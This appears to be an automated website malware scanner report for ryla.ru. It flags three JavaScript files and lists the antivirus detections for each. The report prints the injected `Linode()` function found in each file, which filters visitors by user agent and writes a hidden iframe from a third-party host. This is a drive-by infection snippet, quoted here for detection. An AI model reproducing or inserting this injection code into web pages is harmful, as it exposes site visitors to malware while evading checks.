
Malware Scanner report for ryla.ru

Malicious/Suspicious/Total urls checked
3/0/7
3 of the 7 checked URLs contain malicious code (all three are JavaScript files under /js/). See details below.
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/6
Deface / Content modification
OK

Scanned pages/files

Request | Server response | Status
http://ryla.ru/
200 OK
Content-Length: 32996
Content-Type: text/html
clean
http://ryla.ru/js/JsHttpRequest.js
200 OK
Content-Length: 57661
Content-Type: application/javascript
malicious
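Malicious code - confirmed by antiviruses (see below). The excerpt is truncated by the scanner. The visible part of the injected `Linode()` function reads `navigator.userAgent` and calls `document.write` to insert an iframe from a third-party host only when none of the listed substrings is present. A check made with a user agent containing one of those substrings (Chrome, Android, Linux, Macintosh, iPhone and so on) would therefore likely not see the iframe. The same block appears in all three flagged files.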

function Linode() {
var d = navigator.userAgent;
var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1);
if (!f) {
document.write('<iframe src="http://opilaket.alam-xp.info/triy
... 32995 bytes are skipped ...
sv=_57(_4e,[["action",th.url],["method",th.method],["onsubmit",null],["target",_55]]);
_4e.submit();
_57(_4e,sv);
for(var i=0;i<qt.length;i++){
_4e.lastChild.parentNode.removeChild(_4e.lastChild);
}
if(!_4f){
for(var i=0,n=_4e.elements.length;i<n;i++){
_4e.elements[i].name=_60[i];
}
}
};
JsHttpRequest.setTimeout(_5f,100);
return null;
};
}};

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

AntiVir
JS/iFrame.DI.28
Avast
JS:Iframe-EHX [Trj]
ESET-NOD32
JS/Iframe.JT

http://ryla.ru/js/functions.js
200 OK
Content-Length: 41210
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Linode() {
var d = navigator.userAgent;
var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1);
if (!f) {
document.write('<iframe src="http://opilaket.alam-xp.info/triy
... 41092 bytes are skipped ...
r/>{
dhshowautohelp = false;
if(document.getElementById('autohelp_rows_big')) document.getElementById('autohelp_rows_big').style.display = 'none';
if(document.getElementById('autohelp_rows_width')) document.getElementById('autohelp_rows_width').style.display = 'none';
if(document.getElementById('autohelp_rows')) document.getElementById('autohelp_rows').style.display'no'none';
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

AntiVir
HTML/Rce.Gen
Avast
JS:Iframe-EHG [Trj]
ESET-NOD32
JS/Iframe.JT

http://ryla.ru/js/ajax-poller.js
200 OK
Content-Length: 42778
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Linode() {
var d = navigator.userAgent;
var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1);
if (!f) {
document.write('<iframe src="http://opilaket.alam-xp.info/triy
... 15599 bytes are skipped ...
playResultsWithoutVoting(pollId)
{
var ajaxIndex = ajaxObjects.length;
ajaxObjects[ajaxIndex] = new sack();
ajaxObjects[ajaxIndex].requestFile = serSirSideFile + '?pollId=' + pollId;
prepareForPollResults(pollId);
ajaxObjects[ajaxIndex].onCompletion = function(){ showVoteResults(pollId,ajaxIndex); }; ajaxObjects[ajaxIndex].runAJAX();

}

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
VIPRE
Malware.JS.Generic (JS)
ESET-NOD32
JS/Iframe.JT

http://ryla.ru/randomwords/randwordsjs1.php
200 OK
Content-Length: 137
Content-Type: text/html
clean
http://ryla.ru/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean
http://ryla.ru/randomwords/randwordsjs.php
200 OK
Content-Length: 99
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ryla.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Jun 2014 21:28:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=3463792c91536687ec51dc82b2db5878; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: ryla.ru
Referer: http://www.google.com/search?q=ryla.ru

Result:
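The result is similar to the first query. No suspicious redirects were found. Note that the response headers disclose the server stack (`Server: Apache`, `X-Powered-By: PHP/5.2.17`). The PHP 5.2 branch was already end-of-life at the date of this scan, so the outdated runtime is worth checking as a possible factor when looking for how the files were modified.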

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ryla.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ryla.ru/

Result: ryla.ru is not infected or malware details are not published yet.